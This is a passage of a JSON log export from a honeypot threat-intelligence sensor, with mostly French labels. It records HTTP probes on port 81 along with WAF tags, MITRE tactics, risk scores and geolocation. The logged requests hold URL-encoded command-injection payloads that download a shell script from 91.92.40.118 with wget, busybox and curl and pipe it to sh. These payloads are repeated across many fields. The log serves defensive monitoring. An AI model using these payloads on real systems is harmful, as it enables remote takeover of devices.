\u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022, \u0022confidence\u0022: 0.95, \u0022classification_confidence\u0022: 0.95, \u0022precision_score\u0022: 191, \u0022precision_signals\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-api-probe-generic\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-api-probe-generic\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022, \u0022pat-0212\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022, \u0022Probe \/api\/v1\/\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022, \u0022pat-0212\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 58}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 95.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002211abfdb069af48b8037f814480bd2d20\u0022, \u0022path_pattern_hash\u0022: \u0022212e3326ed94d54abc342a251f15ffe2\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 58}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022query_string\u0022: \u0022command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022query_string\u0022: \u0022command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022lfi-14\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022k8s-api\u0022], \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiaomi%60 HTTP\/1.1\\r\\nHost: 62.3.50\u0022, \u0022payload_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022mitre_tactics\u0022: [\u0022TA0007\u0022, \u0022TA0001\u0022], \u0022mitre\u0022: \u0022TA0007\u0022, \u0022threat_family\u0022: [\u0022unknown\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00222d48f03b3b2857bf461490db5b04afb829cf2e3e\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiao\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022attack_vector\u0022: \u0022rest api enum \u00b7 via HTTP:81 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 10 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022\u00c9num\u00e9ration API REST (tag lfi-12) \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 58\/100 (Moyen) \u2014 MITRE TA0007 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 60.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 58}, \u0022attack_stage\u0022: \u0022probe\u0022, \u0022attack_stage_label\u0022: \u0022Sonde \/ probe\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022risk_score\u0022: 58, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1190-api\u0022, \u0022INT-upstream\u0022, \u0022INT-api-probe-generic\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1190-api\u0022, \u0022Upstream\u0022, \u0022Api Probe Generic\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0007\u0022, \u0022mitre_technique\u0022: \u0022TA0007\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20xiao\u2026\u0022, \u0022request_line\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bcurl%20http:\/\/91.92.40.\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022rest api enum \u00b7 via HTTP:81 \u00b7 (sonde \/ probe) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/api\/v1\/status?command=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20xiaomi%3Bbusybox%20wget%20http:\/\/\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 10 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 10 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022discovery\u0022, \u0022label_fr\u0022: \u0022D\u00e9couverte\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022discovery\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_api_route_probe\u0022, \u0022http_idor_probe\u0022, \u0022http_k8s_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950316:lfi-14\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950600:k8s-api\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_api_route_probe\u0022, \u0022http_idor_probe\u0022, \u0022http_k8s_probe\u0022, \u0022http_no_ua\u0022, \u0022http_probe_api\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":285},{"id":11860779,"ip":"45.156.87.213","ts":"2026-07-14 08:22:34.000000","proto":"tcp","src_port":60002,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":48,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022asp\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022271ef3ec0b94f7acc81ee352ace27ebb9a8891a7\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 301, \u0022payload_entropy\u0022: 5.196305731634076, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002243ce42d445bc01eea8fd33471e38cdf3a2a66dea\u0022, \u0022event_fingerprint\u0022: \u0022ce818976528d79a5a31c0bc278b8603044a19bff\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226888d4cf0873fac59d0818f5ef709ce7\u0022, \u0022path_pattern_hash\u0022: \u002220f2897c9454ee67b73f470dc30b2106\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022query_string\u0022: \u0022syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022query_string\u0022: \u0022syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.\u0022, \u0022payload_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a3ee04d86d4665649aa1270aa5759824550f2b8d\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20bi\u2026\u0022, \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20h\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20bi\u2026\u0022, \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20h\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET 